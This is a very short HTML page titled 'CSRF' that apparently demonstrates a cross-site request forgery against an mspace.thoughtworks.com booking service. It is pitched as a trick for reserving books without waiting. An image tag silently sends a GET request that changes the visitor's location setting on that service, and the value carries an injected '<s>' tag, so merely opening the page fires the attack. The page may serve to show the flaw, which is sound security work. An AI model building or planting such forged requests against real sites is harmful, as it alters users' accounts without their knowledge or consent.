<h1> CSRF </h1>
<h2> Tricks for getting book reserved without waiting on MSPACE ThoughtWorks</h2>
<img src="http://mspace.thoughtworks.com/set_location?location=<s>" />
<h3> Check your mspace now </h3>
